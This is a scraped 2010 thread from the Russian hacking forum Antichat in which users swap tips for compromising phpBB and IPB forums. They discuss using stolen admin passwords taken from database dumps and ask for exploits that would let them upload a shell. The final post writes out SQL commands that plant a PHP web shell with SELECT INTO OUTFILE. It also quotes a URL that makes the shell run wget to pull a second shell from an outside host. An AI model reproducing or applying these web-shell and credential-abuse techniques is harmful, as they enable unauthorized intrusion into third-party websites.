Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

04.04.2010, 23:53
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от tack3r
сижу в панели администратора на форуме двиг phpbb
не могу найти где тут сделать дамп бд . подскажите?
сначала коннектис к БД
|
|
|

09.04.2010, 15:41
|
|
Новичок
Регистрация: 24.06.2009
Сообщений: 3
Провел на форуме: 7257
Репутация:
0
|
|
ipb 2.3.6
Есть что-нибудь на ipb 2.3.6 ?
|
|
|

12.04.2010, 11:48
|
|
Новичок
Регистрация: 04.03.2008
Сообщений: 12
Провел на форуме: 34288
Репутация:
37
|
|
Сообщение от tack3r
сижу в панели администратора на форуме двиг phpbb
не могу найти где тут сделать дамп бд . подскажите?
вообще дампить бд лучше Этим дампером а не из админки, так надёжней и качественней.
|
|
|

12.04.2010, 17:56
|
|
Новичок
Регистрация: 12.02.2010
Сообщений: 3
Провел на форуме: 2379
Репутация:
0
|
|
Есть Учетка главного модератора на форуме phpBB 3.0.7, есть ли какие нибудь уязвимости на заливку шела или доступа к админке форума?
|
|
|

12.04.2010, 22:44
|
|
Новичок
Регистрация: 29.05.2009
Сообщений: 2
Провел на форуме: 18277
Репутация:
0
|
|
Есть дамп pb_2010-04-02_02-35.sql чё можно добыть ? кроме майлов и хешей ?
|
|
|

22.04.2010, 18:11
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме: 691279
Репутация:
55
|
|
del
Последний раз редактировалось ~d0s~; 10.05.2010 в 04:57..
|
|
|

23.04.2010, 23:39
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме: 310791
Репутация:
6
|
|
Есть форум phpBB © 2001, 2005 phpBB Group
Есть логин админа и 100% правильный пароль.
Но почему-то пишет что не подходит.
В пхпбб есть какиенить привязки акка по ip?
Если да,то как правило привязка осуществляется по маске подсети? если подискать подходящую прокси получится войти войти?
Последний раз редактировалось InfectedM; 23.04.2010 в 23:46..
|
|
|

24.04.2010, 00:00
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от InfectedM
Есть форум phpBB © 2001, 2005 phpBB Group
Есть логин админа и 100% правильный пароль.
Но почему-то пишет что не подходит.
В пхпбб есть какиенить привязки акка по ip?
Если да,то как правило привязка осуществляется по маске подсети? если подискать подходящую прокси получится войти войти?
если ты подходишь близко к скрипту авторизации значит уже нет привязка к ip,
а твой пароль может быть пароль к админке а не пароль к форуму,
с какой таблицы вытащил? phpbb_users??
|
|
|

24.04.2010, 04:03
|
|
Познающий
Регистрация: 04.11.2007
Сообщений: 51
Провел на форуме: 310791
Репутация:
6
|
|
Все...там 2 базы от форума было -)стащил с 2 базы пас
Залогинился на форуме под админом.
но Теперь не заходит в админку
Пароль админа от админки и форума может бытьразным?
Если да ,то где искать пароль от админки?
Последний раз редактировалось InfectedM; 24.04.2010 в 04:05..
|
|
|

26.04.2010, 04:11
|
|
Участник форума
Регистрация: 20.12.2008
Сообщений: 130
Провел на форуме: 436500
Репутация:
11
|
|
Пытаюсь залить шелл на форум ипб (впервые), вот возникло пару вопросов, знающие люди пожалуйста помогите
Заливаю через мускуль
CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ; - прошло успешно
INSERT INTO `ibf_shell` ( `shl` ) VALUES (`<?system($_GET[‘c’]) ?>`); - тут жопа, команда не выполняется. Пишет Unknown column '' in 'field list'. (ругается на system($_GET)). Тобишь мне в колонке shl надо создать такую команду. Уверен на 80% что синтаксис неправильный.
SELECT `shl` FROM `ibf_shell` INTO OUTFILE `/www/forum/uploads/shell.php` - не дошел
DROP TABLE `ibf_shell` - прошло успешно
В общем загвоздка со второй строкой, как я уже писал - синтаксис неправильный. Уже и так и сяк пробовал, не выходит.
Потом сразу же вопрос, после выполнения этих мускуль комманд (удачно), мне прийдется дать cmd команды на сервер как я понимаю. Это делается посредством браузерной строки? Где можно просмотреть все возможные команды?
Читал что нужно выполнить запрос в строке браузера типа _http://www.xxx.com?c=wget -O shell.php _http://vasiliy.narod.ru/shell.php.
Заливаю через мускуль ибо другие способы не пашут... Смайлы, аттачи и пхтмл перепробовал.
Заранее спасибо!!
UPD
select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'
Access denied for user 'site.ru'@'localhost' (using password: YES)
Нехватает прав?
Последний раз редактировалось Linkus; 26.04.2010 в 11:43..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|